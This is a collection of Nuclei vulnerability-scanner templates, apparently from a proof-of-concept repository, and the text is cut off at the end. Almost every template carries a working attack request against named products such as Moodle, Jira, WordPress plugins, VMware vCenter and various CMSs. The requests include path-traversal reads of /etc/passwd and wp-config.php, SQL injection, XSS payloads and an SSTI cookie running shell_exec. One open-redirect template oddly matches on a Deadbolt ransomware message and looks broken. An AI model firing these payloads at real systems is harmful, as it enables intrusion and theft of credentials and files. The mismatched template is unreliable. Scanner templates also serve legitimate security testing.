atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'projects' 17 | - 'startAt' 18 | - 'maxResults' 19 | condition: and 20 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-resolutions 2 | 3 | info: 4 | name: Jira Unauthenticated Resolutions 5 | author: TESS 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/resolution" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'self' 19 | - 'description' 20 | - 'name' 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | 27 | - type: word 28 | part: header 29 | words: 30 | - "atlassian.xsrf.token" -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-user-picker 2 | 3 | info: 4 | name: Jira Unauthenticated User Picker 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'user-picker' -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-lfi 2 | 3 | info: 4 | name: Moodle filter_jmol - LFI 5 | author: madrobot 6 | severity: high 7 | description: Local file inclusion on Moodle. 8 | tags: moodle,lfi 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | part: body 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/acme-xss.yaml: -------------------------------------------------------------------------------- 1 | id: acme-xss 2 | 3 | info: 4 | name: ACME / Let's Encrypt Reflected XSS 5 | author: pdteam 6 | severity: medium 7 | tags: xss,acme 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "alert(document.domain)" 19 | - type: word 20 | words: 21 | - "/xml" 22 | - "/html" 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/asanhamayesh-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: asanhamayesh-lfi 2 | 3 | info: 4 | name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018030006 9 | - https://asanhamayesh.com 10 | tags: asanhamayesh,lfi,traversal 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/aspnuke-openredirect.yaml: -------------------------------------------------------------------------------- 1 | id: aspnuke-openredirect 2 | 3 | info: 4 | name: ASP-Nuke Open Redirect 5 | author: pdteam 6 | severity: low 7 | tags: aspnuke,redirect 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569" 13 | 14 | matchers: 15 | - type: regex 16 | part: header 17 | regex: 18 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$' -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/blue-ocean-excellence-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: blue-ocean-excellence-lfi 2 | 3 | info: 4 | name: Blue Ocean Excellence LFI 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/qq_41901122/article/details/116786883 9 | tags: blue-ocean,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "toor:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/couchdb-adminparty.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-adminparty 2 | 3 | info: 4 | name: CouchDB Admin Party 5 | author: organiccrap 6 | severity: high 7 | description: Requests made against CouchDB are done in the context of an admin user. 8 | tags: couchdb 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/_users/_all_docs' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - CouchDB/ 20 | - Erlang OTP/ 21 | part: header 22 | condition: and 23 | - type: word 24 | words: 25 | - total_rows 26 | - offset 27 | part: body 28 | condition: and 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/discourse-xss.yaml: -------------------------------------------------------------------------------- 1 | id: discourse-xss 2 | 3 | info: 4 | name: Discourse CMS - XSS 5 | author: madrobot 6 | severity: medium 7 | description: Cross-site scripting (XSS) on Discourse CMS 8 | tags: xss,discourse 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E' 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "" 23 | part: body 24 | 25 | - type: word 26 | words: 27 | - "text/html" 28 | part: header 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/dss-download-fileread.yaml: -------------------------------------------------------------------------------- 1 | id: dss-download-fileread 2 | 3 | info: 4 | name: DSS Download File Read 5 | author: ritikchaddha 6 | severity: high 7 | tags: lfi,dss,lfr 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0:" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/duomicms-sql-injection.yaml: -------------------------------------------------------------------------------- 1 | id: duomicms-sql-injection 2 | 3 | info: 4 | name: DuomiCMS SQL Injection 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://redn3ck.github.io/2016/11/01/duomiCMS/ 9 | tags: duomicms,sqli 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - "e0ec043b3f9e198ec09041687e4d4e8d" 22 | part: body 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/empirecms-xss.yaml: -------------------------------------------------------------------------------- 1 | id: empirecms-xss 2 | 3 | info: 4 | name: EmpireCMS v75 XSS 5 | author: pikpikcu 6 | severity: medium 7 | reference: 8 | - https://www.geek-share.com/detail/2777280260.html 9 | tags: empirecms,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - 'onmousewheel=\"return bbimg(this)\"' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/flir-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: flir-path-traversal 2 | 3 | info: 4 | name: Flir Path Traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://juejin.cn/post/6961370156484263972 9 | tags: flir,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/download.php?file=/etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/global-domains-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: global-domains-lfi 2 | 3 | info: 4 | name: Global Domains International Directory traversal Vulnerability 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018020247 9 | - http://www.nic.ws 10 | tags: globaldomains,lfi,traversal 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/groupoffice-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: groupoffice-lfi 2 | 3 | info: 4 | name: Groupoffice 3.4.21 Directory Traversal Vulnerability 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018020249 9 | - http://www.group-office.com 10 | tags: groupoffice,lfi,traversal 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/huawei-hg659-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: huawei-hg659-lfi 2 | 3 | info: 4 | name: HUAWEI HG659 LFI 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://twitter.com/sec715/status/1406782172443287559 9 | tags: lfi,huawei 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | 3 | info: 4 | name: MyuCMS Local File Read 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/yalecaltech/article/details/104908257 9 | tags: myucms,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "root:.*:0:0:" 19 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/natshell-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: natshell-path-traversal 2 | 3 | info: 4 | name: NatShell Path Traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw 9 | metadata: 10 | fofa-query: title="蓝海卓越计费管理系统" 11 | tags: natshell,lfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" 17 | 18 | matchers-condition: and 19 | matchers: 20 | 21 | - type: regex 22 | regex: 23 | - "toor:[x*]:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/nginx-module-vts-xss.yaml: -------------------------------------------------------------------------------- 1 | id: nginx-module-vts-xss 2 | 3 | info: 4 | name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting 5 | author: madrobot 6 | severity: medium 7 | tags: nginx,xss,status 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "" 23 | part: body 24 | 25 | - type: word 26 | words: 27 | - "text/html" 28 | part: header 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/nuuo-file-inclusion.yaml: -------------------------------------------------------------------------------- 1 | id: nuuo-file-inclusion 2 | 3 | info: 4 | name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/40211 9 | tags: nuuo,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/css_parser.php?css=css_parser.php" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "$_GET['css']" 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - "text/css" 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/odoo-cms-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: odoo-cms-redirect 2 | 3 | info: 4 | name: Odoo CMS - Open Redirect 5 | author: 0x_Akoko 6 | severity: low 7 | description: Odoo CMS - Open redirection in all versions due to Odoo's policy. 8 | reference: 9 | - https://cxsecurity.com/issue/WLB-2021020143 10 | - https://www.odoo.com/page/security-nonvuln-redirectors 11 | tags: odoo,redirect 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/" 17 | 18 | matchers: 19 | - type: regex 20 | regex: 21 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' 22 | part: header 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/pacsone-server-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: pacsone-server-lfi 2 | 3 | info: 4 | name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018010303 9 | tags: pacsone,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml: -------------------------------------------------------------------------------- 1 | id: pdf-signer-ssti-to-rce 2 | 3 | info: 4 | name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie 5 | author: madrobot 6 | severity: high 7 | tags: ssti,rce,csrf 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | headers: 14 | Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" 15 | 16 | skip-variables-check: true 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | part: body 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/phpok-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: phpok-sqli 2 | 3 | info: 4 | name: PHPOK - Sql Injection 5 | author: ritikchaddha 6 | severity: high 7 | metadata: 8 | fofa-query: app="phpok" 9 | tags: phpok,sqli 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - '{{md5("{{randstr}}")}}' 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/phpwiki-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: phpwiki-lfi 2 | 3 | info: 4 | name: phpwiki 1.5.4 - XSS / Local File Inclusion 5 | author: 0x_Akoko 6 | severity: high 7 | description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. 8 | reference: 9 | - https://www.exploit-db.com/exploits/38027 10 | tags: phpwiki,lfi,xss 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/phpwiki/index.php/passwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/pmb-local-file-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: pmb-local-file-disclosure 2 | 3 | info: 4 | name: PMB 5.6 - getgif.php Arbitrary File Retrieval 5 | author: dhiyaneshDk 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/49054 9 | tags: lfi,pmb 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "root:x:0" 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/resin-cnnvd-200705-315.yaml: -------------------------------------------------------------------------------- 1 | id: resin-cnnvd-200705-315 2 | 3 | info: 4 | name: Caucho Resin Information Disclosure 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 9 | tags: resin,caucho,lfr 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/%20../web-inf/" 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - "/ ../web-inf/" 24 | - "Directory of /" 25 | condition: and 26 | part: body 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/seacms-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: seacms-sqli 2 | 3 | info: 4 | name: SeaCMS V8.7 SQL Injection 5 | author: ritikchaddha 6 | severity: high 7 | reference: 8 | - https://www.uedbox.com/post/54561/ 9 | tags: seacms,sqli 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`" 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "6f7c6dcbc380aac3bcba1f9fccec991e" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/sl-studio-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: sl-studio-lfi 2 | 3 | info: 4 | name: Webbdesign SL-Studio Directory Traversal 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018110187 9 | metadata: 10 | google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' 11 | tags: slstudio,lfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/spark-webui-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: spark-webui-unauth 2 | 3 | info: 4 | name: Unauthenticated Spark WebUI 5 | author: princechaddha 6 | severity: medium 7 | reference: 8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc 9 | tags: spark,unauth 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "Spark Master at spark://" 24 | - "URL:" 25 | part: body 26 | condition: and 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/symantec-messaging-gateway.yaml: -------------------------------------------------------------------------------- 1 | id: symantec-messaging-gateway 2 | 3 | info: 4 | name: Symantec Messaging Gateway LFI 5 | author: Random_Robbie 6 | severity: medium 7 | description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal 8 | tags: lfi,messaging,symantec 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "struts-default.xml" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/thinkific-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: thinkific-redirect 2 | 3 | info: 4 | name: Open Redirect vulnerability on thinkific websites 5 | author: Gal Nagli 6 | severity: medium 7 | tags: redirect 8 | 9 | requests: 10 | - method: GET 11 | 12 | path: 13 | - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 302 20 | - type: word 21 | words: 22 | - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-vcenter-lfi-linux 2 | 3 | info: 4 | name: Vmware Vcenter LFI for Linux appliances 5 | author: PR3R00T 6 | severity: high 7 | tags: vmware,lfi,vcenter 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/eam/vib?id=/etc/issue" 13 | matchers: 14 | - type: word 15 | words: 16 | - "vCenter Server" 17 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: ecology-filedownload-directory-traversal 2 | 3 | info: 4 | name: Ecology Directory Traversal 5 | author: princechaddha 6 | severity: medium 7 | metadata: 8 | fofa-query: app="泛微-协同办公OA" 9 | tags: ecology,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml" 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "/weaver/" 23 | part: body 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: ecology-springframework-directory-traversal 2 | 3 | info: 4 | name: Ecology Springframework Directory Traversal 5 | author: princechaddha 6 | severity: medium 7 | tags: ecology,springframework,lfi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml" 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "/weaver/" 21 | part: body 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dzs-zoomsounds-listing 2 | 3 | info: 4 | name: WordPress Plugin dzs zoomsounds 5 | author: pussycat0x 6 | severity: info 7 | description: Searches for sensitive directories present in the wordpress-plugins plugin. 8 | tags: wordpress,listing,wp-plugin,wp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Index of" 20 | - "/wp-content/plugins/dzs-zoomsounds" 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/sniplets-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: sniplets-lfi 2 | 3 | info: 4 | name: Wordpress Plugin Sniplets 1.1.2 - LFI 5 | author: dhiyaneshDK 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/5194 9 | tags: wordpress,wp-plugin,lfi,wp 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "DB_NAME" 22 | - "DB_PASSWORD" 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-affiliatewp-log 2 | 3 | info: 4 | name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure 5 | author: dhiyaneshDK 6 | severity: low 7 | tags: wordpress,log,plugin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Referral could not be retrieved' 19 | - 'Affiliate CSV' 20 | 21 | - type: word 22 | words: 23 | - 'text/plain' 24 | part: header 25 | 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-db-backup-listing 2 | 3 | info: 4 | name: WordPress DB Backup 5 | author: Suman_Kar 6 | severity: medium 7 | tags: wordpress,backup 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/uploads/database-backups/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Index of /" 19 | - "wp-content/uploads/database-backups" 20 | - ".sql" 21 | condition: and 22 | part: body 23 | 24 | - type: status 25 | status: 26 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-db-backup.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-db-backup 2 | 3 | info: 4 | name: WordPress DB Backup 5 | author: dwisiswant0 6 | severity: medium 7 | tags: wordpress,backups 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/backup-db/" 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - "Index of /" 18 | - ".sql\">" 19 | condition: and 20 | part: body 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-debug-log.yaml: -------------------------------------------------------------------------------- 1 | id: wp-debug-log 2 | 3 | info: 4 | name: WordPress debug log 5 | author: geraldino2,dwisiswant0 6 | severity: low 7 | tags: wordpress,log 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/wp-content/debug.log" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - octet-stream 19 | - text/plain 20 | part: header 21 | condition: or 22 | 23 | - type: regex 24 | regex: 25 | - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" 26 | part: body 27 | 28 | - type: status 29 | status: 30 | - 200 -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/wordpress/wordpress-directory-listing.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-directory-listing 2 | 3 | info: 4 | name: Wordpress directory listing 5 | author: Manas_Harsh 6 | severity: info 7 | tags: wordpress 